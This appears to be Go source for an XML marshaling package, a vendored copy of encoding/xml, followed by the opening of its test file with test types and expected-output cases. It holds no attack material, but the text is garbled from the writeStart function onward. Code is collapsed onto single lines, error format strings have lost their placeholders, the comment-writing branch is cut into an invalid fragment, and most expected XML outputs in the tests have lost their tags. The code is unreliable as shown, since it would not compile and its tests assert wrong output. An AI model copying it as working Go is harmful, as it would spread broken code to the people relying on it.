// markPrefix pushes an empty string onto the prefix stack. popPrefix stops at
// this mark, so prefixes declared after it are scoped to one element.
func (p *printer) markPrefix() {
	p.prefixes = append(p.prefixes, "")
}

// popPrefix removes the prefixes declared since the last mark, deleting each
// from the attribute maps, and removes the mark itself.
func (p *printer) popPrefix() {
	for len(p.prefixes) > 0 {
		prefix := p.prefixes[len(p.prefixes)-1]
		p.prefixes = p.prefixes[:len(p.prefixes)-1]
		if prefix == "" {
			break
		}
		p.deleteAttrPrefix(prefix)
	}
}

// Interface types looked up once and compared against with Implements.
var (
	marshalerType     = reflect.TypeFor[Marshaler]()
	marshalerAttrType = reflect.TypeFor[MarshalerAttr]()
	textMarshalerType = reflect.TypeFor[encoding.TextMarshaler]()
)

// marshalValue writes one or more XML elements representing val.
// If val was obtained from a struct field, finfo must have its details.
//
// Values whose type (or pointer type) implements Marshaler or
// encoding.TextMarshaler are handed to marshalInterface or
// marshalTextInterface. Other non-struct values are written through
// EscapeText or EscapeString. The function calls itself for slice and array
// elements and is called again by marshalStruct for struct fields; no depth
// limit is applied here.
func (p *printer) marshalValue(val reflect.Value, finfo *fieldInfo, startTemplate *StartElement) error {
	if startTemplate != nil && startTemplate.Name.Local == "" {
		return fmt.Errorf("xml: EncodeElement of StartElement with missing name")
	}

	if !val.IsValid() {
		return nil
	}
	if finfo != nil && finfo.flags&fOmitEmpty != 0 && isEmptyValue(val) {
		return nil
	}

	// Drill into interfaces and pointers.
	// This can turn into an infinite loop given a cyclic chain,
	// but it matches the Go 1 behavior.
	for val.Kind() == reflect.Interface || val.Kind() == reflect.Pointer {
		if val.IsNil() {
			return nil
		}
		val = val.Elem()
	}

	kind := val.Kind()
	typ := val.Type()

	// Check for marshaler.
	// The value type is tried first, then the pointer type if val is addressable.
	if val.CanInterface() && typ.Implements(marshalerType) {
		return p.marshalInterface(val.Interface().(Marshaler), defaultStart(typ, finfo, startTemplate))
	}
	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(marshalerType) {
			return p.marshalInterface(pv.Interface().(Marshaler), defaultStart(pv.Type(), finfo, startTemplate))
		}
	}

	// Check for text marshaler.
	if val.CanInterface() && typ.Implements(textMarshalerType) {
		return p.marshalTextInterface(val.Interface().(encoding.TextMarshaler), defaultStart(typ, finfo, startTemplate))
	}
	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(textMarshalerType) {
			return p.marshalTextInterface(pv.Interface().(encoding.TextMarshaler), defaultStart(pv.Type(), finfo, startTemplate))
		}
	}

	// Slices and arrays iterate over the elements. They do not have an enclosing tag.
	// Byte slices and byte arrays are excluded and fall through to marshalSimple.
	if (kind == reflect.Slice || kind == reflect.Array) && typ.Elem().Kind() != reflect.Uint8 {
		for i, n := 0, val.Len(); i < n; i++ {
			if err := p.marshalValue(val.Index(i), finfo, startTemplate); err != nil {
				return err
			}
		}
		return nil
	}

	tinfo, err := getTypeInfo(typ)
	if err != nil {
		return err
	}

	// Create start element.
	// Precedence for the XML element name is:
	// 0. startTemplate
	// 1. XMLName field in underlying struct;
	// 2. field name/tag in the struct field; and
	// 3. type name
	var start StartElement

	if startTemplate != nil {
		start.Name = startTemplate.Name
		// Copy the attributes so appends below do not touch the template's slice.
		start.Attr = append(start.Attr, startTemplate.Attr...)
		start.Empty = startTemplate.Empty
	} else if tinfo.xmlname != nil {
		xmlname := tinfo.xmlname
		if xmlname.name != "" {
			start.Name.Space, start.Name.Local = xmlname.xmlns, xmlname.name
		} else {
			fv := xmlname.value(val, dontInitNilPointers)
			if v, ok := fv.Interface().(Name); ok && v.Local != "" {
				start.Name = v
			}
		}
	}
	if start.Name.Local == "" && finfo != nil {
		start.Name.Space, start.Name.Local = finfo.xmlns, finfo.name
	}
	if start.Name.Local == "" {
		name := typ.Name()
		if i := strings.IndexByte(name, '['); i >= 0 {
			// Truncate generic instantiation name. See issue 48318.
			name = name[:i]
		}
		if name == "" {
			return &UnsupportedTypeError{typ}
		}
		start.Name.Local = name
	}

	// Attributes
	// Only fields flagged fAttr are handled here; marshalAttr appends to start.Attr.
	for i := range tinfo.fields {
		finfo := &tinfo.fields[i]
		if finfo.flags&fAttr == 0 {
			continue
		}
		fv := finfo.value(val, dontInitNilPointers)

		if finfo.flags&fOmitEmpty != 0 && (!fv.IsValid() || isEmptyValue(fv)) {
			continue
		}

		if fv.Kind() == reflect.Interface && fv.IsNil() {
			continue
		}

		name := Name{Space: finfo.xmlns, Local: finfo.name}
		if err := p.marshalAttr(&start, name, fv); err != nil {
			return err
		}
	}

	// If an empty name was found, namespace is overridden with an empty space
	if tinfo.xmlname != nil && start.Name.Space == "" &&
		tinfo.xmlname.xmlns == "" && tinfo.xmlname.name == "" &&
		len(p.tags) != 0 && p.tags[len(p.tags)-1].Space != "" {
		start.Attr = append(start.Attr, Attr{Name{"", xmlnsPrefix}, "", ""})
	}

	if err := p.writeStart(&start); err != nil {
		return err
	}

	if val.Kind() == reflect.Struct {
		err = p.marshalStruct(tinfo, val)
	} else {
		// Simple values: bytes go through EscapeText, strings through EscapeString.
		s, b, err1 := p.marshalSimple(typ, val)
		if err1 != nil {
			err = err1
		} else if b != nil {
			EscapeText(p, b)
		} else {
			p.EscapeString(s, false)
		}
	}
	if err != nil {
		return err
	}

	if err := p.writeEnd(start.Name, start.Empty); err != nil {
		return err
	}

	// Surface any write error recorded by the printer while writing the element.
	return p.cachedWriteError()
}

// marshalAttr marshals an attribute with the given name and value, adding to start.Attr.
func (p *printer) marshalAttr(start *StartElement, name Name, val reflect.Value) error {
	// Nothing is written here: attributes are only collected in start.Attr.
	// writeStart later emits each value through EscapeString(attr.Value, true)
	// but writes the attribute's local name as-is, so an Attr returned by a
	// MarshalerAttr must carry a well-formed name.

	// 1. MarshalerAttr implemented by the value type.
	if val.CanInterface() && val.Type().Implements(marshalerAttrType) {
		custom, err := val.Interface().(MarshalerAttr).MarshalXMLAttr(name)
		if err != nil {
			return err
		}
		// An Attr with an empty local name means "emit nothing".
		if custom.Name.Local != "" {
			start.Attr = append(start.Attr, custom)
		}
		return nil
	}

	// 2. MarshalerAttr implemented by the pointer type, if val is addressable.
	if val.CanAddr() {
		if ptr := val.Addr(); ptr.CanInterface() && ptr.Type().Implements(marshalerAttrType) {
			custom, err := ptr.Interface().(MarshalerAttr).MarshalXMLAttr(name)
			if err != nil {
				return err
			}
			if custom.Name.Local != "" {
				start.Attr = append(start.Attr, custom)
			}
			return nil
		}
	}

	// 3. encoding.TextMarshaler implemented by the value type.
	if val.CanInterface() && val.Type().Implements(textMarshalerType) {
		encoded, err := val.Interface().(encoding.TextMarshaler).MarshalText()
		if err != nil {
			return err
		}
		start.Attr = append(start.Attr, Attr{name, string(encoded), ""})
		return nil
	}

	// 4. encoding.TextMarshaler implemented by the pointer type.
	if val.CanAddr() {
		if ptr := val.Addr(); ptr.CanInterface() && ptr.Type().Implements(textMarshalerType) {
			encoded, err := ptr.Interface().(encoding.TextMarshaler).MarshalText()
			if err != nil {
				return err
			}
			start.Attr = append(start.Attr, Attr{name, string(encoded), ""})
			return nil
		}
	}

	// Nil pointers and nil interfaces produce no attribute; otherwise step
	// one level into the pointed-at value.
	if k := val.Kind(); k == reflect.Pointer || k == reflect.Interface {
		if val.IsNil() {
			return nil
		}
		val = val.Elem()
	}

	// A slice (other than a byte slice) yields one attribute per element,
	// all under the same name.
	if val.Kind() == reflect.Slice && val.Type().Elem().Kind() != reflect.Uint8 {
		for i, count := 0, val.Len(); i < count; i++ {
			if err := p.marshalAttr(start, name, val.Index(i)); err != nil {
				return err
			}
		}
		return nil
	}

	// A value that already is an Attr is appended unchanged, name included.
	if val.Type() == attrType {
		start.Attr = append(start.Attr, val.Interface().(Attr))
		return nil
	}

	// Everything else must be a simple value; byte results are converted to a string.
	str, raw, err := p.marshalSimple(val.Type(), val)
	if err != nil {
		return err
	}
	if raw != nil {
		str = string(raw)
	}
	start.Attr = append(start.Attr, Attr{name, str, ""})
	return nil
}

// defaultStart returns the default start element to use,
// given the reflect type, field info, and start template.
func defaultStart(typ reflect.Type, finfo *fieldInfo, startTemplate *StartElement) StartElement {
	var elem StartElement
	// Precedence for the XML element name is as in marshalValue,
	// except that structs are not inspected for an XMLName field.
	switch {
	case startTemplate != nil:
		elem.Name = startTemplate.Name
		// Copy rather than alias the template's attribute slice.
		// NOTE(review): unlike marshalValue, Empty is not copied from the
		// template here - confirm this is intended.
		elem.Attr = append(elem.Attr, startTemplate.Attr...)
	case finfo != nil && finfo.name != "":
		elem.Name.Local = finfo.name
		elem.Name.Space = finfo.xmlns
	case typ.Name() != "":
		elem.Name.Local = typ.Name()
	default:
		// Must be a pointer to a named type,
		// since it has the Marshaler methods.
		elem.Name.Local = typ.Elem().Name()
	}
	return elem
}

// marshalInterface marshals a Marshaler interface value.
//
// The caller-supplied MarshalXML receives the encoder itself, so the tag
// stack is fenced with a marker before the call and checked afterwards.
func (p *printer) marshalInterface(val Marshaler, start StartElement) error {
	// The empty Name is the marker: writeEnd refuses to pop an entry whose
	// Local is empty, so MarshalXML cannot close tags it did not open.
	p.tags = append(p.tags, Name{})
	mark := len(p.tags)

	if err := val.MarshalXML(p.encoder, start); err != nil {
		return err
	}

	// Anything above the marker is an element MarshalXML opened and left open.
	if len(p.tags) > mark {
		return fmt.Errorf("xml: %s.MarshalXML wrote invalid XML: <%s> not closed", receiverType(val), p.tags[len(p.tags)-1].Local)
	}
	// Drop the marker (p.tags[mark-1]).
	p.tags = p.tags[:mark-1]
	return nil
}

// marshalTextInterface marshals a TextMarshaler interface value.
//
// The start tag is written before MarshalText is called, and the returned
// text is passed through EscapeText before it reaches the output.
func (p *printer) marshalTextInterface(val encoding.TextMarshaler, start StartElement) error {
	if err := p.writeStart(&start); err != nil {
		return err
	}
	content, err := val.MarshalText()
	if err != nil {
		return err
	}
	EscapeText(p, content)
	return p.writeEnd(start.Name, start.Empty)
}

// writeStart writes the given start element.
func (p *printer) writeStart(start *StartElement) error { if start.Name.Local == "" { return fmt.Errorf("xml: start tag with no name") } p.tags = append(p.tags, start.Name) p.markPrefix() p.writeIndent(1) p.WriteByte('<') p.WriteString(start.Name.Local) if start.Name.Space != "" { p.WriteString(` xmlns="`) p.EscapeString(start.Name.Space, false) p.WriteByte('"') } // Attributes for _, attr := range start.Attr { name := attr.Name if name.Local == "" { continue } if attr.Diff == "" { p.WriteByte(' ') } else { p.WriteString(attr.Diff) } if name.Space != "" { p.WriteString(p.createAttrPrefix(name.Space)) p.WriteByte(':') } p.WriteString(name.Local) p.WriteString(`="`) p.EscapeString(attr.Value, true) p.WriteByte('"') } p.WriteString(start.Diff) if start.Empty { p.WriteByte('/') } p.WriteByte('>') return nil } func (p *printer) writeEnd(name Name, empty bool) error { if name.Local == "" { return fmt.Errorf("xml: end tag with no name") } if len(p.tags) == 0 || p.tags[len(p.tags)-1].Local == "" { return fmt.Errorf("xml: end tag without start tag", name.Local) } if top := p.tags[len(p.tags)-1]; top != name { if top.Local != name.Local { return fmt.Errorf("xml: end tag does not match start tag <%s>", name.Local, top.Local) } return fmt.Errorf("xml: end tag in namespace %s does not match start tag <%s> in namespace %s", name.Local, name.Space, top.Local, top.Space) } p.tags = p.tags[:len(p.tags)-1] if !empty { p.writeIndent(-1) p.WriteByte('<') p.WriteByte('/') p.WriteString(name.Local) p.WriteByte('>') } p.popPrefix() return nil } func (p *printer) marshalSimple(typ reflect.Type, val reflect.Value) (string, []byte, error) { switch val.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: return strconv.FormatInt(val.Int(), 10), nil, nil case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: return strconv.FormatUint(val.Uint(), 10), nil, nil case reflect.Float32, reflect.Float64: return 
strconv.FormatFloat(val.Float(), 'g', -1, val.Type().Bits()), nil, nil case reflect.String: return val.String(), nil, nil case reflect.Bool: return strconv.FormatBool(val.Bool()), nil, nil case reflect.Array: if typ.Elem().Kind() != reflect.Uint8 { break } // [...]byte var bytes []byte if val.CanAddr() { bytes = val.Bytes() } else { bytes = make([]byte, val.Len()) reflect.Copy(reflect.ValueOf(bytes), val) } return "", bytes, nil case reflect.Slice: if typ.Elem().Kind() != reflect.Uint8 { break } // []byte return "", val.Bytes(), nil } return "", nil, &UnsupportedTypeError{typ} } var ddBytes = []byte("--") // indirect drills into interfaces and pointers, returning the pointed-at value. // If it encounters a nil interface or pointer, indirect returns that nil value. // This can turn into an infinite loop given a cyclic chain, // but it matches the Go 1 behavior. func indirect(vf reflect.Value) reflect.Value { for vf.Kind() == reflect.Interface || vf.Kind() == reflect.Pointer { if vf.IsNil() { return vf } vf = vf.Elem() } return vf } func (p *printer) marshalStruct(tinfo *typeInfo, val reflect.Value) error { s := parentStack{p: p} for i := range tinfo.fields { finfo := &tinfo.fields[i] if finfo.flags&fAttr != 0 { continue } vf := finfo.value(val, dontInitNilPointers) if !vf.IsValid() { // The field is behind an anonymous struct field that's // nil. Skip it. 
continue } switch finfo.flags & fMode { case fCDATA, fCharData: emit := EscapeText if finfo.flags&fMode == fCDATA { emit = emitCDATA } if err := s.trim(finfo.parents); err != nil { return err } if vf.CanInterface() && vf.Type().Implements(textMarshalerType) { data, err := vf.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } if err := emit(p, data); err != nil { return err } continue } if vf.CanAddr() { pv := vf.Addr() if pv.CanInterface() && pv.Type().Implements(textMarshalerType) { data, err := pv.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } if err := emit(p, data); err != nil { return err } continue } } var scratch [64]byte vf = indirect(vf) switch vf.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: if err := emit(p, strconv.AppendInt(scratch[:0], vf.Int(), 10)); err != nil { return err } case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: if err := emit(p, strconv.AppendUint(scratch[:0], vf.Uint(), 10)); err != nil { return err } case reflect.Float32, reflect.Float64: if err := emit(p, strconv.AppendFloat(scratch[:0], vf.Float(), 'g', -1, vf.Type().Bits())); err != nil { return err } case reflect.Bool: if err := emit(p, strconv.AppendBool(scratch[:0], vf.Bool())); err != nil { return err } case reflect.String: if err := emit(p, []byte(vf.String())); err != nil { return err } case reflect.Slice: if elem, ok := vf.Interface().([]byte); ok { if err := emit(p, elem); err != nil { return err } } } continue case fComment: if err := s.trim(finfo.parents); err != nil { return err } vf = indirect(vf) k := vf.Kind() if !(k == reflect.String || k == reflect.Slice && vf.Type().Elem().Kind() == reflect.Uint8) { return fmt.Errorf("xml: bad type for comment field of %s", val.Type()) } if vf.Len() == 0 { continue } p.writeIndent(0) p.WriteString("" is invalid grammar. 
Make it "- -->" p.WriteByte(' ') } p.WriteString("-->") continue case fInnerXML: vf = indirect(vf) iface := vf.Interface() switch raw := iface.(type) { case []byte: p.Write(raw) continue case string: p.WriteString(raw) continue } case fElement, fElement | fAny: if err := s.trim(finfo.parents); err != nil { return err } if len(finfo.parents) > len(s.stack) { if vf.Kind() != reflect.Pointer && vf.Kind() != reflect.Interface || !vf.IsNil() { if err := s.push(finfo.parents[len(s.stack):]); err != nil { return err } } } } if err := p.marshalValue(vf, finfo, nil); err != nil { return err } } s.trim(nil) return p.cachedWriteError() } // Write implements io.Writer func (p *printer) Write(b []byte) (n int, err error) { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { n, p.err = p.w.Write(b) } return n, p.err } // WriteString implements io.StringWriter func (p *printer) WriteString(s string) (n int, err error) { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { n, p.err = p.w.WriteString(s) } return n, p.err } // WriteByte implements io.ByteWriter func (p *printer) WriteByte(c byte) error { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { p.err = p.w.WriteByte(c) } return p.err } // Close the Encoder, indicating that no more data will be written. It flushes // any buffered XML to the underlying writer and returns an error if the // written XML is invalid (e.g. by containing unclosed elements). 
func (p *printer) Close() error {
	// Closing twice is a no-op.
	if p.closed {
		return nil
	}
	// Mark closed first: later Write/WriteString/WriteByte calls record an error.
	p.closed = true

	flushErr := p.w.Flush()
	if flushErr != nil {
		return flushErr
	}
	// Any name left on the tag stack is an element that was never ended.
	if open := len(p.tags); open > 0 {
		return fmt.Errorf("unclosed tag <%s>", p.tags[open-1].Local)
	}
	return nil
}

// cachedWriteError returns the error the printer has recorded, if any, by
// issuing a write of nil through p.Write.
func (p *printer) cachedWriteError() error {
	_, err := p.Write(nil)
	return err
}

// writeIndent writes the newline, line prefix and indentation that precede a
// tag, and adjusts the depth: a positive depthDelta is used before a start
// tag, a negative one before an end tag. It does nothing when neither a
// prefix nor an indent string is configured.
func (p *printer) writeIndent(depthDelta int) {
	if p.prefix == "" && p.indent == "" {
		return
	}
	if depthDelta < 0 {
		p.depth--
		justIndentedIn := p.indentedIn
		p.indentedIn = false
		if justIndentedIn {
			// The matching start tag was the last thing indented, so the
			// end tag stays on the same line.
			return
		}
	}
	// No newline before the very first indented line.
	if !p.putNewline {
		p.putNewline = true
	} else {
		p.WriteByte('\n')
	}
	if p.prefix != "" {
		p.WriteString(p.prefix)
	}
	if p.indent != "" {
		for level := 0; level < p.depth; level++ {
			p.WriteString(p.indent)
		}
	}
	if depthDelta > 0 {
		p.depth++
		p.indentedIn = true
	}
}

// parentStack tracks the parent elements currently open on a printer, by
// local name.
type parentStack struct {
	p     *printer
	stack []string
}

// trim updates the XML context to match the longest common prefix of the stack
// and the given parents. A closing tag will be written for every parent
// popped. Passing a zero slice or nil will close all the elements.
func (s *parentStack) trim(parents []string) error {
	// Length of the shared leading run of names.
	common := 0
	for common < len(parents) && common < len(s.stack) && parents[common] == s.stack[common] {
		common++
	}
	// Close everything beyond the shared run, innermost first.
	for idx := len(s.stack) - 1; idx >= common; idx-- {
		if err := s.p.writeEnd(Name{Local: s.stack[idx]}, false); err != nil {
			return err
		}
	}
	s.stack = s.stack[:common]
	return nil
}

// push adds parent elements to the stack and writes open tags.
func (s *parentStack) push(parents []string) error {
	for _, parent := range parents {
		if err := s.p.writeStart(&StartElement{Name: Name{Local: parent}}); err != nil {
			return err
		}
	}
	// The stack is extended only after every start tag was accepted.
	s.stack = append(s.stack, parents...)
	return nil
}

// UnsupportedTypeError is returned when [Marshal] encounters a type
// that cannot be converted into XML.
type UnsupportedTypeError struct { Type reflect.Type } func (e *UnsupportedTypeError) Error() string { return "xml: unsupported type: " + e.Type.String() } func isEmptyValue(v reflect.Value) bool { switch v.Kind() { case reflect.Array, reflect.Map, reflect.Slice, reflect.String: return v.Len() == 0 case reflect.Bool, reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr, reflect.Float32, reflect.Float64, reflect.Interface, reflect.Pointer: return v.IsZero() } return false } ================================================ FILE: internal/thirdparty/xml/marshal_test.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bytes" "errors" "fmt" "io" "reflect" "strconv" "strings" "sync" "testing" "time" ) type DriveType int const ( HyperDrive DriveType = iota ImprobabilityDrive ) type Passenger struct { Name []string `xml:"name"` Weight float32 `xml:"weight"` } type Ship struct { XMLName struct{} `xml:"spaceship"` Name string `xml:"name,attr"` Pilot string `xml:"pilot,attr"` Drive DriveType `xml:"drive"` Age uint `xml:"age"` Passenger []*Passenger `xml:"passenger"` secret string } type NamedType string type Port struct { XMLName struct{} `xml:"port"` Type string `xml:"type,attr,omitempty"` Comment string `xml:",comment"` Number string `xml:",chardata"` } type Domain struct { XMLName struct{} `xml:"domain"` Country string `xml:",attr,omitempty"` Name []byte `xml:",chardata"` Comment []byte `xml:",comment"` } type Book struct { XMLName struct{} `xml:"book"` Title string `xml:",chardata"` } type Event struct { XMLName struct{} `xml:"event"` Year int `xml:",chardata"` } type Movie struct { XMLName struct{} `xml:"movie"` Length uint `xml:",chardata"` } type Pi struct { XMLName struct{} 
`xml:"pi"` Approximation float32 `xml:",chardata"` } type Universe struct { XMLName struct{} `xml:"universe"` Visible float64 `xml:",chardata"` } type Particle struct { XMLName struct{} `xml:"particle"` HasMass bool `xml:",chardata"` } type Departure struct { XMLName struct{} `xml:"departure"` When time.Time `xml:",chardata"` } type SecretAgent struct { XMLName struct{} `xml:"agent"` Handle string `xml:"handle,attr"` Identity string Obfuscate string `xml:",innerxml"` } type NestedItems struct { XMLName struct{} `xml:"result"` Items []string `xml:">item"` Item1 []string `xml:"Items>item1"` } type NestedOrder struct { XMLName struct{} `xml:"result"` Field1 string `xml:"parent>c"` Field2 string `xml:"parent>b"` Field3 string `xml:"parent>a"` } type MixedNested struct { XMLName struct{} `xml:"result"` A string `xml:"parent1>a"` B string `xml:"b"` C string `xml:"parent1>parent2>c"` D string `xml:"parent1>d"` } type NilTest struct { A any `xml:"parent1>parent2>a"` B any `xml:"parent1>b"` C any `xml:"parent1>parent2>c"` } type Service struct { XMLName struct{} `xml:"service"` Domain *Domain `xml:"host>domain"` Port *Port `xml:"host>port"` Extra1 any Extra2 any `xml:"host>extra2"` } var nilStruct *Ship type EmbedA struct { EmbedC EmbedB EmbedB FieldA string embedD } type EmbedB struct { FieldB string *EmbedC } type EmbedC struct { FieldA1 string `xml:"FieldA>A1"` FieldA2 string `xml:"FieldA>A2"` FieldB string FieldC string } type embedD struct { fieldD string FieldE string // Promoted and visible when embedD is embedded. 
} type NameCasing struct { XMLName struct{} `xml:"casing"` Xy string XY string XyA string `xml:"Xy,attr"` XYA string `xml:"XY,attr"` } type NamePrecedence struct { XMLName Name `xml:"Parent"` FromTag XMLNameWithoutTag `xml:"InTag"` FromNameVal XMLNameWithoutTag FromNameTag XMLNameWithTag InFieldName string } type XMLNameWithTag struct { XMLName Name `xml:"InXMLNameTag"` Value string `xml:",chardata"` } type XMLNameWithoutTag struct { XMLName Name Value string `xml:",chardata"` } type NameInField struct { Foo Name `xml:"ns foo"` } type AttrTest struct { Int int `xml:",attr"` Named int `xml:"int,attr"` Float float64 `xml:",attr"` Uint8 uint8 `xml:",attr"` Bool bool `xml:",attr"` Str string `xml:",attr"` Bytes []byte `xml:",attr"` } type AttrsTest struct { Attrs []Attr `xml:",any,attr"` Int int `xml:",attr"` Named int `xml:"int,attr"` Float float64 `xml:",attr"` Uint8 uint8 `xml:",attr"` Bool bool `xml:",attr"` Str string `xml:",attr"` Bytes []byte `xml:",attr"` } type OmitAttrTest struct { Int int `xml:",attr,omitempty"` Named int `xml:"int,attr,omitempty"` Float float64 `xml:",attr,omitempty"` Uint8 uint8 `xml:",attr,omitempty"` Bool bool `xml:",attr,omitempty"` Str string `xml:",attr,omitempty"` Bytes []byte `xml:",attr,omitempty"` PStr *string `xml:",attr,omitempty"` } type OmitFieldTest struct { Int int `xml:",omitempty"` Named int `xml:"int,omitempty"` Float float64 `xml:",omitempty"` Uint8 uint8 `xml:",omitempty"` Bool bool `xml:",omitempty"` Str string `xml:",omitempty"` Bytes []byte `xml:",omitempty"` PStr *string `xml:",omitempty"` Ptr *PresenceTest `xml:",omitempty"` } type AnyTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField AnyHolder `xml:",any"` } type AnyOmitTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField *AnyHolder `xml:",any,omitempty"` } type AnySliceTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField []AnyHolder `xml:",any"` } type AnyHolder 
struct { XMLName Name XML string `xml:",innerxml"` } type RecurseA struct { A string B *RecurseB } type RecurseB struct { A *RecurseA B string } type PresenceTest struct { Exists *struct{} } type IgnoreTest struct { PublicSecret string `xml:"-"` } type MyBytes []byte type Data struct { Bytes []byte Attr []byte `xml:",attr"` Custom MyBytes } type Plain struct { V any } type MyInt int type EmbedInt struct { MyInt } type Strings struct { X []string `xml:"A>B,omitempty"` } type PointerFieldsTest struct { XMLName Name `xml:"dummy"` Name *string `xml:"name,attr"` Age *uint `xml:"age,attr"` Empty *string `xml:"empty,attr"` Contents *string `xml:",chardata"` } type ChardataEmptyTest struct { XMLName Name `xml:"test"` Contents *string `xml:",chardata"` } type PointerAnonFields struct { *MyInt *NamedType } type MyMarshalerTest struct { } var _ Marshaler = (*MyMarshalerTest)(nil) func (m *MyMarshalerTest) MarshalXML(e *Encoder, start StartElement) error { e.EncodeToken(start) e.EncodeToken(CharData{data: []byte("hello world")}) e.EncodeToken(EndElement{start.Name, false}) return nil } type MyMarshalerAttrTest struct { } var _ MarshalerAttr = (*MyMarshalerAttrTest)(nil) func (m *MyMarshalerAttrTest) MarshalXMLAttr(name Name) (Attr, error) { return Attr{name, "hello world", ""}, nil } func (m *MyMarshalerAttrTest) UnmarshalXMLAttr(attr Attr) error { return nil } type MarshalerStruct struct { Foo MyMarshalerAttrTest `xml:",attr"` } type InnerStruct struct { XMLName Name `xml:"testns outer"` } type OuterStruct struct { InnerStruct IntAttr int `xml:"int,attr"` } type OuterNamedStruct struct { InnerStruct XMLName Name `xml:"outerns test"` IntAttr int `xml:"int,attr"` } type OuterNamedOrderedStruct struct { XMLName Name `xml:"outerns test"` InnerStruct IntAttr int `xml:"int,attr"` } type OuterOuterStruct struct { OuterStruct } type NestedAndChardata struct { AB []string `xml:"A>B"` Chardata string `xml:",chardata"` } type NestedAndComment struct { AB []string `xml:"A>B"` Comment 
string `xml:",comment"` } type CDataTest struct { Chardata string `xml:",cdata"` } type NestedAndCData struct { AB []string `xml:"A>B"` CDATA string `xml:",cdata"` } func ifaceptr(x any) any { return &x } func stringptr(x string) *string { return &x } type T1 struct{} type T2 struct{} type IndirComment struct { T1 T1 Comment *string `xml:",comment"` T2 T2 } type DirectComment struct { T1 T1 Comment string `xml:",comment"` T2 T2 } type IfaceComment struct { T1 T1 Comment any `xml:",comment"` T2 T2 } type IndirChardata struct { T1 T1 Chardata *string `xml:",chardata"` T2 T2 } type DirectChardata struct { T1 T1 Chardata string `xml:",chardata"` T2 T2 } type IfaceChardata struct { T1 T1 Chardata any `xml:",chardata"` T2 T2 } type IndirCDATA struct { T1 T1 CDATA *string `xml:",cdata"` T2 T2 } type DirectCDATA struct { T1 T1 CDATA string `xml:",cdata"` T2 T2 } type IfaceCDATA struct { T1 T1 CDATA any `xml:",cdata"` T2 T2 } type IndirInnerXML struct { T1 T1 InnerXML *string `xml:",innerxml"` T2 T2 } type DirectInnerXML struct { T1 T1 InnerXML string `xml:",innerxml"` T2 T2 } type IfaceInnerXML struct { T1 T1 InnerXML any `xml:",innerxml"` T2 T2 } type IndirElement struct { T1 T1 Element *string T2 T2 } type DirectElement struct { T1 T1 Element string T2 T2 } type IfaceElement struct { T1 T1 Element any T2 T2 } type IndirOmitEmpty struct { T1 T1 OmitEmpty *string `xml:",omitempty"` T2 T2 } type DirectOmitEmpty struct { T1 T1 OmitEmpty string `xml:",omitempty"` T2 T2 } type IfaceOmitEmpty struct { T1 T1 OmitEmpty any `xml:",omitempty"` T2 T2 } type IndirAny struct { T1 T1 Any *string `xml:",any"` T2 T2 } type DirectAny struct { T1 T1 Any string `xml:",any"` T2 T2 } type IfaceAny struct { T1 T1 Any any `xml:",any"` T2 T2 } type Generic[T any] struct { X T } var ( nameAttr = "Sarah" ageAttr = uint(12) contentsAttr = "lorem ipsum" empty = "" ) // Unless explicitly stated as such (or *Plain), all of the // tests below are two-way tests. 
When introducing new tests, // please try to make them two-way as well to ensure that // marshaling and unmarshaling are as symmetrical as feasible. var marshalTests = []struct { Value any ExpectXML string MarshalOnly bool MarshalError string UnmarshalOnly bool UnmarshalError string }{ // Test nil marshals to nothing {Value: nil, ExpectXML: ``, MarshalOnly: true}, {Value: nilStruct, ExpectXML: ``, MarshalOnly: true}, // Test value types {Value: &Plain{true}, ExpectXML: `true`}, {Value: &Plain{false}, ExpectXML: `false`}, {Value: &Plain{int(42)}, ExpectXML: `42`}, {Value: &Plain{int8(42)}, ExpectXML: `42`}, {Value: &Plain{int16(42)}, ExpectXML: `42`}, {Value: &Plain{int32(42)}, ExpectXML: `42`}, {Value: &Plain{uint(42)}, ExpectXML: `42`}, {Value: &Plain{uint8(42)}, ExpectXML: `42`}, {Value: &Plain{uint16(42)}, ExpectXML: `42`}, {Value: &Plain{uint32(42)}, ExpectXML: `42`}, {Value: &Plain{float32(1.25)}, ExpectXML: `1.25`}, {Value: &Plain{float64(1.25)}, ExpectXML: `1.25`}, {Value: &Plain{uintptr(0xFFDD)}, ExpectXML: `65501`}, {Value: &Plain{"gopher"}, ExpectXML: `gopher`}, {Value: &Plain{[]byte("gopher")}, ExpectXML: `gopher`}, {Value: &Plain{""}, ExpectXML: `</>`}, {Value: &Plain{[]byte("")}, ExpectXML: `</>`}, {Value: &Plain{[3]byte{'<', '/', '>'}}, ExpectXML: `</>`}, {Value: &Plain{NamedType("potato")}, ExpectXML: `potato`}, {Value: &Plain{[]int{1, 2, 3}}, ExpectXML: `123`}, {Value: &Plain{[3]int{1, 2, 3}}, ExpectXML: `123`}, {Value: ifaceptr(true), MarshalOnly: true, ExpectXML: `true`}, // Test time. { Value: &Plain{time.Unix(1e9, 123456789).UTC()}, ExpectXML: `2001-09-09T01:46:40.123456789Z`, }, // A pointer to struct{} may be used to test for an element's presence. { Value: &PresenceTest{new(struct{})}, ExpectXML: ``, }, { Value: &PresenceTest{}, ExpectXML: ``, }, // A []byte field is only nil if the element was not found. 
